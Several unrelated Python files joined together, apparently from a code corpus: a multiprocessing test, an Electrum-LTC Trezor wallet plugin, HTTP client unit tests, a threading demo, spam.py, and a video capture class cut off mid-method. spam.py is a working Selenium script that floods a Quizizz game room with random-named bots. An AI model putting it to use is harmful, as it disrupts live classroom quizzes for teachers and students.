print('\t' + str(cond))
time.sleep(2)
print('\tchild is notifying')
print('\t' + str(cond))
cond.notify()
cond.release()
def test_condition():
cond = multiprocessing.Condition()
p = multiprocessing.Process(target=condition_func, args=(cond,))
print(cond)
cond.acquire()
print(cond)
cond.acquire()
print(cond)
p.start()
print('main is waiting')
cond.wait()
print('main has woken up')
print(cond)
cond.release()
print(cond)
cond.release()
p.join()
print(cond)
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print(running.value, 'tasks are running')
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print('%s has finished' % multiprocessing.current_process())
mutex.release()
sema.release()
def test_semaphore():
sema = multiprocessing.Semaphore(3)
mutex = multiprocessing.RLock()
running = multiprocessing.Value('i', 0)
processes = [
multiprocessing.Process(target=semaphore_func,
args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print('\tchild sleeping')
time.sleep(5.5)
print('\n\tchild terminating')
def test_join_timeout():
p = multiprocessing.Process(target=join_timeout_func)
p.start()
print('waiting for process to finish')
while 1:
p.join(timeout=1)
if not p.is_alive():
break
print('.', end=' ')
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print('\t%r is waiting' % multiprocessing.current_process())
event.wait()
print('\t%r has woken up' % multiprocessing.current_process())
def test_event():
event = multiprocessing.Event()
processes = [multiprocessing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print('main is sleeping')
time.sleep(2)
print('main is setting event')
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print('Tests passed')
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', list(range(100))),
('d', [0.25 * i for i in range(100)]),
('H', list(range(1000)))
]
shared_values = [multiprocessing.Value(id, v) for id, v in values]
shared_arrays = [multiprocessing.Array(id, a) for id, a in arrays]
p = multiprocessing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.exitcode == 0
####
def test(namespace=multiprocessing):
global multiprocessing
multiprocessing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print('\n\t######## %s\n' % func.__name__)
func()
ignore = multiprocessing.active_children() # cleanup any old processes
if hasattr(multiprocessing, '_debug_info'):
info = multiprocessing._debug_info()
if info:
print(info)
raise ValueError('there should be no positive refcounts left')
if __name__ == '__main__':
multiprocessing.freeze_support()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print(' Using processes '.center(79, '-'))
namespace = multiprocessing
elif sys.argv[1] == 'manager':
print(' Using processes and a manager '.center(79, '-'))
namespace = multiprocessing.Manager()
namespace.Process = multiprocessing.Process
namespace.current_process = multiprocessing.current_process
namespace.active_children = multiprocessing.active_children
elif sys.argv[1] == 'threads':
print(' Using threads '.center(79, '-'))
import multiprocessing.dummy as namespace
else:
print('Usage:\n\t%s [processes | manager | threads]' % sys.argv[0])
raise SystemExit(2)
test(namespace)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ltc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugins import BasePlugin, Device
from electrum_ltc.transaction import deserialize, Transaction
from electrum_ltc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1, 100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
threading_demo.py
|
import threading
from time import sleep
def install_wordpress(customer):
"""code to mimic some heavy work"""
print(f"Start installation for {customer}")
sleep(3)
print(f"All done for {customer}")
def developers_day(customers):
"""using threading ensure every thread dont comflict"""
lock = threading.Lock()
def dev_day(id):
print(f"Goodmoring from developer {id}")
# let's lock
lock.acquire()
while customers:
customer = customers.pop(0)
lock.release()
# do the work
install_wordpress(customer)
lock.acquire()
lock.release()
print(f"Bye from developer {id}")
devs = [threading.Thread(target=dev_day, args=(i, )) for i in range(5)]
# start in morning
[dev.start() for dev in devs]
# end for evening
[dev.join() for dev in devs]
developers_day(["Customer %d" % i for i in range(5)])
|
spam.py
|
import os
import secrets
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, init
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options as FirefoxOptions
init(autoreset=True)
URL = 'https://quizizz.com/join'
def spam(code, number_of_bots, headless):
if headless:
options = webdriver.FirefoxOptions()
options.headless = True
driver = webdriver.Firefox(options=options)
else:
driver = webdriver.Firefox()
for i in range(number_of_bots):
driver.switch_to.window(driver.window_handles[i])
driver.get(URL)
while True:
try:
code_input = driver.find_element_by_class_name('check-room-input')
code_input.send_keys(code)
time.sleep(0.05)
code_input.send_keys(Keys.RETURN)
break
except:
time.sleep(0.25)
while True:
try:
name_input = driver.find_element_by_class_name('enter-name-field')
name_input.clear()
time.sleep(0.1)
name_input.send_keys(secrets.token_hex(4))
time.sleep(0.05)
name_input.send_keys(Keys.RETURN)
break
except:
time.sleep(0.25)
driver.execute_script(f'''window.open("{URL}","_blank");''')
time.sleep(0.1)
if __name__ == '__main__':
try:
code = input(f'Enter code: {Fore.GREEN}')
print(Fore.RESET)
number_of_bots = int(input(f'Enter the number of bots to join: {Fore.GREEN}'))
print(Fore.RESET)
number_of_threads = int(input(f'Enter the number of threads to use: {Fore.GREEN}'))
print(Fore.RESET)
start_time = time.perf_counter()
threads = []
for i in range(number_of_threads):
t = threading.Thread(target=spam, args=(code, (number_of_bots // number_of_threads), False,))
threads.append(t)
t.start()
for idx, thread in enumerate(threads):
thread.join()
print(f'Time taken for {number_of_bots}: {time.perf_counter() - start_time}')
except KeyboardInterrupt:
print(f'{Fore.RESET}Quitting')
os.system('taskkill /F /IM firefox.exe')
print('\nClosed all instances of firefox.exe')
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
import subprocess
import threading
import logging
import cv2
class Protocol(Enum):
FILE = 0
CSI = 1
V4L2 = 2
RTSP = 3
class VideoIO:
"""
Class for video capturing from video files or cameras, and writing video files.
Encoding and decoding are accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame.
config : Dict
Camera configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
latency : float
Approximate video processing latency.
"""
def __init__(self, size, config, input_uri, output_uri=None, latency=1/30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.camera_size = config['camera_size']
self.camera_fps = config['camera_fps']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
self.fps = self.cap.get(cv2.CAP_PROP_FPS)
if self.fps == 0:
self.fps = self.camera_fps # fallback
self.capture_dt = 1 / self.fps
logging.info('%dx%d stream @ %d FPS', *self.size, self.fps)
output_fps = self.fps
if self.protocol != Protocol.FILE:
# limit capture interval at processing latency
self.capture_dt = max(self.capture_dt, latency)
output_fps = 1 / self.capture_dt
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
